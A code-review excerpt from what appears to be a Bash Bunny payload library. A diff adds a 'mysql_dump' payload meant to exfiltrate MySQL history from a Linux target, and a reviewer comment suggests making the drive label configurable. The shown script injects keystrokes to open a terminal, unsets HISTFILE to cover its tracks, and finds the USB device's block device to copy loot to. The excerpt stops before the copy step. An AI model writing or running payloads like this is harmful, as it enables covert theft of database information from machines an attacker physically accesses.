payloads/library/exfiltration/mysql_dump/payload.txt

```diff
@@ -0,0 +1,53 @@
+# Title: mysql_dump
+# Description: mysql_dump, a payload used to exfiltrate mysql history. Looting mysql history can be useful understanding targets database schema.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Exfiltaration.
+# Target: GNU/Linux.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
```

Comment:
Similar to your other payload, I would recommend using a variable assignment for the drive label as not everyone's configuration will have the default `BashBunny`  drive label. This makes user configuration much easier. 

You can do this by adding it to the top of your payload. For example with line: 
```
DRIVE_LABEL="BashBunny"
Q STRING disk='$(lsblk -fs | grep '"$DRIVE_LABEL"' | awk '\''{print $1}'\)''
```